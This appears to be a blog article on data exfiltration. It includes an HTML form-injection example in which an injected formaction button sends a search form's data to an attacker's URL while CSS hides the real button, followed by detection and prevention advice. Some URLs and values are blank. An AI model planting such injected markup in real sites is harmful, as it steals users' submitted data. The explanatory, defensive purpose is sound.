Sensitive Data-Exfiltration


The argument of this article is the leakage of sensitive information from a protected network to an external network due to intruders exploiting the various vulnerabilities of the hw-sw system. Sensitive information could be contained in:

  • static files: images, texts, spreadsheets, phone-books, agenda etc.;
  •  multimedia sessions: telephone conversations, video conferences, chatting channels (text, video image).

The leakage can be done in several ways:

- the data are ex-filtrated without altering the original files;
- the data are modified: converted in new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are ex-filtrated using a combination of the aforementioned techniques.

“Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”. [02]
Considering the data-exfiltartion at several levels and analysing the related risks we have the following threats:

National Security: the steal of classified documents may endanger national security;
Organizations: proprietary information can be sold to a rival company causing a loss of competitive advantage;
Citizens: the spreading of personal sensitive data could have serious privacy and security implications like identity theft.

For the National Security and Organizations the worst scenario is when the attackers not only steal data but also modify them producing cyber-espionage and cyber-sabotage.



An attacker can export users’ sensitive data using “HTML form injection attack”. Here is an example of using the formaction attribute. According to the HTML 5 specification, it can be used to overwrite the action attribute of its parent form.

Le us consider the following normal form in a HTML page:


<form action=”URL” ... >

list of couples (label, data-box)

<button type=”submit”... /> label </button>



We inject a formaction attribute:

<form action=”URL” ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL "> Fake Search! </button>


The injected form sends its form-data to BAD URL instead of URL.



The following HTML:



<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">




Produce this form in the web browser:

Normal Web Form

On the other hand now we have the abused HTML:
<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction=""> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">



It is important to point out that the formaction attribute is supported in Internet Explorer 10, Firefox, Opera, Chrome, and Safari.

The previous HTML shows in the browser:

Abused Web Form
By clicking on Fake Search! button the next HTTP request is produced:

Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This show how the data are sent to instead of



In order to face this serious problem the security system of a ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

The goal of prevention is to lower the risk of attacks.
The blocking of unauthorized communication channels is a mechanism to prevent the exfiltration of data externally to the organization through compromised applications.

We need a system to detect when a web site is compromised to promptly react to the attack.
The use of Sensitive Information Dissemination Detection (SIDD) systems is a mechanism for stopping leakage of sensitive information on time. It monitors the outbound traffic from the protected network, taking actions responsively in case of suspect traffic of packets.

When the attack is in progress we have to limit the damages.
After attack detection this is what must be done:

1) minimize the information leakage;
2) analyze what vulnerability has been exploited and if it is structural of the system or not;
3) harden the security of the information system to avoid another attack of the same type.

If the security system doesn't detect any problems. It is still highly recommended to run a random deep security check because an information leakage could have been happened without anyones awareness of it.



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  3. Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, Usa.


Leave a Reply

Your email address will not be published. Required fields are marked *